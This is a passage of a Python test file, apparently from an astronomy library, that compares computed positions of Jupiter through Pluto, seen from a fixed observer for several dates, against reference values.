compare(alt.degrees, (-3.540294697028628, -54.1089628741949, -36.90573266459917, 22.094794272017666), 0.001 * arcsecond)
compare(az.degrees, (118.34877634707522, 338.0117138951488, 76.12368450672822, 231.6381663847761), 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, (-3.540294697028628, -54.1089628741949, -36.90573266459917, 22.134776069489533), 0.001 * arcsecond)
compare(az.degrees, (118.34877634707522, 338.0117138951488, 76.12368450672822, 231.6381663847761), 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, (-3.540294697028628, -54.1089628741949, -36.90573266459917, 22.135181528743814), 0.001 * arcsecond)
compare(az.degrees, (118.34877634707522, 338.0117138951488, 76.12368450672822, 231.6381663847761), 0.001 * arcsecond)
def test_jupiter_topocentric_date0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.jupiter).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 12.103946503374884, 0.001 * ra_arcsecond)
compare(dec.degrees, 0.6522085918269475, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 12.077992233588102, 0.001 * ra_arcsecond)
compare(dec.degrees, 0.821355893113747, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 49.40651603144681, 0.001 * arcsecond)
compare(az.degrees, 156.07088561561997, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 49.42056980196601, 0.001 * arcsecond)
compare(az.degrees, 156.07088561561997, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 49.420712533159694, 0.001 * arcsecond)
compare(az.degrees, 156.07088561561997, 0.001 * arcsecond)
def test_jupiter_topocentric_date1():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.jupiter).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 6.764836821339949, 0.001 * ra_arcsecond)
compare(dec.degrees, 23.17058790055951, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 6.755365668515656, 0.001 * ra_arcsecond)
compare(dec.degrees, 23.18253602996423, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 38.00505126690997, 0.001 * arcsecond)
compare(az.degrees, 270.63795554820535, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 38.02600464378366, 0.001 * arcsecond)
compare(az.degrees, 270.63795554820535, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 38.02621739324931, 0.001 * arcsecond)
compare(az.degrees, 270.63795554820535, 0.001 * arcsecond)
def test_jupiter_topocentric_date2():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.jupiter).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 1.5914118935512866, 0.001 * ra_arcsecond)
compare(dec.degrees, 8.595923929888196, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 1.5911839414385696, 0.001 * ra_arcsecond)
compare(dec.degrees, 8.593862752942394, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -42.482560972481394, 0.001 * arcsecond)
compare(az.degrees, 359.3596746827537, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -42.482560972481394, 0.001 * arcsecond)
compare(az.degrees, 359.3596746827537, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -42.482560972481394, 0.001 * arcsecond)
compare(az.degrees, 359.3596746827537, 0.001 * arcsecond)
def test_jupiter_topocentric_date3():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.jupiter).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 4.82276173655752, 0.001 * ra_arcsecond)
compare(dec.degrees, 21.649526689253502, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 4.835667333191383, 0.001 * ra_arcsecond)
compare(dec.degrees, 21.670171438742255, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -29.289013841967986, 0.001 * arcsecond)
compare(az.degrees, 4.327425566855523, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -29.289013841967986, 0.001 * arcsecond)
compare(az.degrees, 4.327425566855523, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -29.289013841967986, 0.001 * arcsecond)
compare(az.degrees, 4.327425566855523, 0.001 * arcsecond)
def test_jupiter_topocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.jupiter).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (12.103946503374884, 6.764836821339949, 1.5914118935512866, 4.82276173655752), 0.001 * ra_arcsecond)
compare(dec.degrees, (0.6522085918269475, 23.17058790055951, 8.595923929888196, 21.649526689253502), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (12.077992233588102, 6.755365668515656, 1.5911839414385696, 4.835667333191383), 0.001 * ra_arcsecond)
compare(dec.degrees, (0.821355893113747, 23.18253602996423, 8.593862752942394, 21.670171438742255), 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, (49.40651603144681, 38.00505126690997, -42.482560972481394, -29.289013841967986), 0.001 * arcsecond)
compare(az.degrees, (156.07088561561997, 270.63795554820535, 359.3596746827537, 4.327425566855523), 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, (49.42056980196601, 38.02600464378366, -42.482560972481394, -29.289013841967986), 0.001 * arcsecond)
compare(az.degrees, (156.07088561561997, 270.63795554820535, 359.3596746827537, 4.327425566855523), 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, (49.420712533159694, 38.02621739324931, -42.482560972481394, -29.289013841967986), 0.001 * arcsecond)
compare(az.degrees, (156.07088561561997, 270.63795554820535, 359.3596746827537, 4.327425566855523), 0.001 * arcsecond)
def test_saturn_topocentric_date0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.saturn).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 2.4626938858905594, 0.001 * ra_arcsecond)
compare(dec.degrees, 12.045561201575383, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 2.4352742791152338, 0.001 * ra_arcsecond)
compare(dec.degrees, 11.911391441362444, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -20.662686940324093, 0.001 * arcsecond)
compare(az.degrees, 306.01978569992787, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -20.662686940324093, 0.001 * arcsecond)
compare(az.degrees, 306.01978569992787, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -20.662686940324093, 0.001 * arcsecond)
compare(az.degrees, 306.01978569992787, 0.001 * arcsecond)
def test_saturn_topocentric_date1():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.saturn).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 19.814469727768646, 0.001 * ra_arcsecond)
compare(dec.degrees, -20.932928080758664, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 19.805283998285297, 0.001 * ra_arcsecond)
compare(dec.degrees, -20.958246345579155, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -48.93337647838982, 0.001 * arcsecond)
compare(az.degrees, 76.8837444919445, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -48.93337647838982, 0.001 * arcsecond)
compare(az.degrees, 76.8837444919445, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -48.93337647838982, 0.001 * arcsecond)
compare(az.degrees, 76.8837444919445, 0.001 * arcsecond)
def test_saturn_topocentric_date2():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.saturn).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 2.5845847757319116, 0.001 * ra_arcsecond)
compare(dec.degrees, 12.616768688416162, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 2.584352575888522, 0.001 * ra_arcsecond)
compare(dec.degrees, 12.614560194137907, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -36.501918751911674, 0.001 * arcsecond)
compare(az.degrees, 341.22347230453323, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -36.501918751911674, 0.001 * arcsecond)
compare(az.degrees, 341.22347230453323, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -36.501918751911674, 0.001 * arcsecond)
compare(az.degrees, 341.22347230453323, 0.001 * arcsecond)
def test_saturn_topocentric_date3():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.saturn).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 13.628268137367913, 0.001 * ra_arcsecond)
compare(dec.degrees, -7.658197329820583, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 13.639621846921335, 0.001 * ra_arcsecond)
compare(dec.degrees, -7.723370683249701, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 22.96675851611188, 0.001 * arcsecond)
compare(az.degrees, 238.00627672875672, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 23.005094362956072, 0.001 * arcsecond)
compare(az.degrees, 238.00627672875672, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 23.005483182929098, 0.001 * arcsecond)
compare(az.degrees, 238.00627672875672, 0.001 * arcsecond)
def test_saturn_topocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.saturn).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (2.4626938858905594, 19.814469727768646, 2.5845847757319116, 13.628268137367913), 0.001 * ra_arcsecond)
compare(dec.degrees, (12.045561201575383, -20.932928080758664, 12.616768688416162, -7.658197329820583), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (2.4352742791152338, 19.805283998285297, 2.584352575888522, 13.639621846921335), 0.001 * ra_arcsecond)
compare(dec.degrees, (11.911391441362444, -20.958246345579155, 12.614560194137907, -7.723370683249701), 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, (-20.662686940324093, -48.93337647838982, -36.501918751911674, 22.96675851611188), 0.001 * arcsecond)
compare(az.degrees, (306.01978569992787, 76.8837444919445, 341.22347230453323, 238.00627672875672), 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, (-20.662686940324093, -48.93337647838982, -36.501918751911674, 23.005094362956072), 0.001 * arcsecond)
compare(az.degrees, (306.01978569992787, 76.8837444919445, 341.22347230453323, 238.00627672875672), 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, (-20.662686940324093, -48.93337647838982, -36.501918751911674, 23.005483182929098), 0.001 * arcsecond)
compare(az.degrees, (306.01978569992787, 76.8837444919445, 341.22347230453323, 238.00627672875672), 0.001 * arcsecond)
def test_uranus_topocentric_date0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.uranus).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 12.087016642067397, 0.001 * ra_arcsecond)
compare(dec.degrees, 0.20824442104711183, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 12.061058763070791, 0.001 * ra_arcsecond)
compare(dec.degrees, 0.37741883683460087, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 49.06396822144731, 0.001 * arcsecond)
compare(az.degrees, 156.65256040205296, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 49.078192535060566, 0.001 * arcsecond)
compare(az.degrees, 156.65256040205296, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 49.07833699756142, 0.001 * arcsecond)
compare(az.degrees, 156.65256040205296, 0.001 * arcsecond)
def test_uranus_topocentric_date1():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.uranus).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 18.668863148648313, 0.001 * ra_arcsecond)
compare(dec.degrees, -23.43704804377175, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 18.65936510933368, 0.001 * ra_arcsecond)
compare(dec.degrees, -23.447712978993913, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -37.0259637798912, 0.001 * arcsecond)
compare(az.degrees, 91.80748703145906, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -37.0259637798912, 0.001 * arcsecond)
compare(az.degrees, 91.80748703145906, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -37.0259637798912, 0.001 * arcsecond)
compare(az.degrees, 91.80748703145906, 0.001 * arcsecond)
def test_uranus_topocentric_date2():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.uranus).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 21.16527335872666, 0.001 * ra_arcsecond)
compare(dec.degrees, -17.020308119118386, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 21.164991487815, 0.001 * ra_arcsecond)
compare(dec.degrees, -17.020361566142082, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -29.175475562665554, 0.001 * arcsecond)
compare(az.degrees, 88.85671230431439, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -29.175475562665554, 0.001 * arcsecond)
compare(az.degrees, 88.85671230431439, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -29.175475562665554, 0.001 * arcsecond)
compare(az.degrees, 88.85671230431439, 0.001 * arcsecond)
def test_uranus_topocentric_date3():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.uranus).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 0.48945083888242796, 0.001 * ra_arcsecond)
compare(dec.degrees, 2.358286196725548, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 0.5005545778924997, 0.001 * ra_arcsecond)
compare(dec.degrees, 2.4296958868419787, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -14.5260443119261, 0.001 * arcsecond)
compare(az.degrees, 74.60219420538265, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -14.5260443119261, 0.001 * arcsecond)
compare(az.degrees, 74.60219420538265, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -14.5260443119261, 0.001 * arcsecond)
compare(az.degrees, 74.60219420538265, 0.001 * arcsecond)
def test_uranus_topocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.uranus).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (12.087016642067397, 18.668863148648313, 21.16527335872666, 0.48945083888242796), 0.001 * ra_arcsecond)
compare(dec.degrees, (0.20824442104711183, -23.43704804377175, -17.020308119118386, 2.358286196725548), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (12.061058763070791, 18.65936510933368, 21.164991487815, 0.5005545778924997), 0.001 * ra_arcsecond)
compare(dec.degrees, (0.37741883683460087, -23.447712978993913, -17.020361566142082, 2.4296958868419787), 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, (49.06396822144731, -37.0259637798912, -29.175475562665554, -14.5260443119261), 0.001 * arcsecond)
compare(az.degrees, (156.65256040205296, 91.80748703145906, 88.85671230431439, 74.60219420538265), 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, (49.078192535060566, -37.0259637798912, -29.175475562665554, -14.5260443119261), 0.001 * arcsecond)
compare(az.degrees, (156.65256040205296, 91.80748703145906, 88.85671230431439, 74.60219420538265), 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, (49.07833699756142, -37.0259637798912, -29.175475562665554, -14.5260443119261), 0.001 * arcsecond)
compare(az.degrees, (156.65256040205296, 91.80748703145906, 88.85671230431439, 74.60219420538265), 0.001 * arcsecond)
def test_neptune_topocentric_date0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.neptune).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 15.637396931781986, 0.001 * ra_arcsecond)
compare(dec.degrees, -17.680489951171502, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 15.608492665044128, 0.001 * ra_arcsecond)
compare(dec.degrees, -17.583829722494027, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 4.86937782636538, 0.001 * arcsecond)
compare(az.degrees, 117.29043762875409, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 5.031511017145419, 0.001 * arcsecond)
compare(az.degrees, 117.29043762875409, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 5.033116634143141, 0.001 * arcsecond)
compare(az.degrees, 117.29043762875409, 0.001 * arcsecond)
def test_neptune_topocentric_date1():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.neptune).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 19.036514568239326, 0.001 * ra_arcsecond)
compare(dec.degrees, -21.792523874854822, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 19.027165016434417, 0.001 * ra_arcsecond)
compare(dec.degrees, -21.808061138689617, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -40.43318694811052, 0.001 * arcsecond)
compare(az.degrees, 86.51833613444356, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -40.43318694811052, 0.001 * arcsecond)
compare(az.degrees, 86.51833613444356, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -40.43318694811052, 0.001 * arcsecond)
compare(az.degrees, 86.51833613444356, 0.001 * arcsecond)
def test_neptune_topocentric_date2():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.neptune).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 20.362478654099593, 0.001 * ra_arcsecond)
compare(dec.degrees, -19.213665913911328, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 20.36219137258442, 0.001 * ra_arcsecond)
compare(dec.degrees, -19.21325376377245, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -21.102154672787563, 0.001 * arcsecond)
compare(az.degrees, 98.14962081515444, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -21.102154672787563, 0.001 * arcsecond)
compare(az.degrees, 98.14962081515444, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -21.102154672787563, 0.001 * arcsecond)
compare(az.degrees, 98.14962081515444, 0.001 * arcsecond)
def test_neptune_topocentric_date3():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.neptune).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 22.252831344843074, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.502690543226894, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 22.26432121506238, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.437371208596403, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 2.41678290499992, 0.001 * arcsecond)
compare(az.degrees, 106.8092597257607, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 2.6713913487620147, 0.001 * arcsecond)
compare(az.degrees, 106.8092597257607, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 2.6738334093305696, 0.001 * arcsecond)
compare(az.degrees, 106.8092597257607, 0.001 * arcsecond)
def test_neptune_topocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.neptune).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (15.637396931781986, 19.036514568239326, 20.362478654099593, 22.252831344843074), 0.001 * ra_arcsecond)
compare(dec.degrees, (-17.680489951171502, -21.792523874854822, -19.213665913911328, -11.502690543226894), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (15.608492665044128, 19.027165016434417, 20.36219137258442, 22.26432121506238), 0.001 * ra_arcsecond)
compare(dec.degrees, (-17.583829722494027, -21.808061138689617, -19.21325376377245, -11.437371208596403), 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, (4.86937782636538, -40.43318694811052, -21.102154672787563, 2.41678290499992), 0.001 * arcsecond)
compare(az.degrees, (117.29043762875409, 86.51833613444356, 98.14962081515444, 106.8092597257607), 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, (5.031511017145419, -40.43318694811052, -21.102154672787563, 2.6713913487620147), 0.001 * arcsecond)
compare(az.degrees, (117.29043762875409, 86.51833613444356, 98.14962081515444, 106.8092597257607), 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, (5.033116634143141, -40.43318694811052, -21.102154672787563, 2.6738334093305696), 0.001 * arcsecond)
compare(az.degrees, (117.29043762875409, 86.51833613444356, 98.14962081515444, 106.8092597257607), 0.001 * arcsecond)
def test_pluto_topocentric_date0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.pluto).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 12.015146948702718, 0.001 * ra_arcsecond)
compare(dec.degrees, 16.622956629676764, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 11.989238323883423, 0.001 * ra_arcsecond)
compare(dec.degrees, 16.792209116103148, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 64.72856074651983, 0.001 * arcsecond)
compare(az.degrees, 147.2138070056058, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 64.73630449169308, 0.001 * arcsecond)
compare(az.degrees, 147.2138070056058, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 64.73638314930092, 0.001 * arcsecond)
compare(az.degrees, 147.2138070056058, 0.001 * arcsecond)
def test_pluto_topocentric_date1():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.pluto).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 15.216666873470118, 0.001 * ra_arcsecond)
compare(dec.degrees, -1.335915234746897, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 15.208587498665665, 0.001 * ra_arcsecond)
compare(dec.degrees, -1.3022917220648205, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 16.233734452123414, 0.001 * arcsecond)
compare(az.degrees, 105.3994365631196, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 16.28889280191291, 0.001 * arcsecond)
compare(az.degrees, 105.3994365631196, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 16.289451329649054, 0.001 * arcsecond)
compare(az.degrees, 105.3994365631196, 0.001 * arcsecond)
def test_pluto_topocentric_date2():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.pluto).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 16.761532920101487, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.396347593297179, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 16.76128368305737, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.39433478419375, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 22.700996363632996, 0.001 * arcsecond)
compare(az.degrees, 127.81134408260581, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 22.739821647292274, 0.001 * arcsecond)
compare(az.degrees, 127.81134408260581, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 22.74021541578692, 0.001 * arcsecond)
compare(az.degrees, 127.81134408260581, 0.001 * arcsecond)
def test_pluto_topocentric_date3():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.pluto).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 18.488579709427018, 0.001 * ra_arcsecond)
compare(dec.degrees, -19.551785355075808, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 18.501344365322606, 0.001 * ra_arcsecond)
compare(dec.degrees, -19.541283736216652, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 28.33982206878914, 0.001 * arcsecond)
compare(az.degrees, 157.51785266272373, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 28.370071242061236, 0.001 * arcsecond)
compare(az.degrees, 157.51785266272373, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 28.370378222043662, 0.001 * arcsecond)
compare(az.degrees, 157.51785266272373, 0.001 * arcsecond)
def test_pluto_topocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.pluto).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (12.015146948702718, 15.216666873470118, 16.761532920101487, 18.488579709427018), 0.001 * ra_arcsecond)
compare(dec.degrees, (16.622956629676764, -1.335915234746897, -11.396347593297179, -19.551785355075808), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (11.989238323883423, 15.208587498665665, 16.76128368305737, 18.501344365322606), 0.001 * ra_arcsecond)
compare(dec.degrees, (16.792209116103148, -1.3022917220648205, -11.39433478419375, -19.541283736216652), 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, (64.72856074651983, 16.233734452123414, 22.700996363632996, 28.33982206878914), 0.001 * arcsecond)
compare(az.degrees, (147.2138070056058, 105.3994365631196, 127.81134408260581, 157.51785266272373), 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, (64.73630449169308, 16.28889280191291, 22.739821647292274, 28.370071242061236), 0.001 * arcsecond)
compare(az.degrees, (147.2138070056058, 105.3994365631196, 127.81134408260581, 157.51785266272373), 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, (64.73638314930092, 16.289451329649054, 22.74021541578692, 28.370378222043662), 0.001 * arcsecond)
compare(az.degrees, (147.2138070056058, 105.3994365631196, 127.81134408260581, 157.51785266272373), 0.001 * arcsecond)
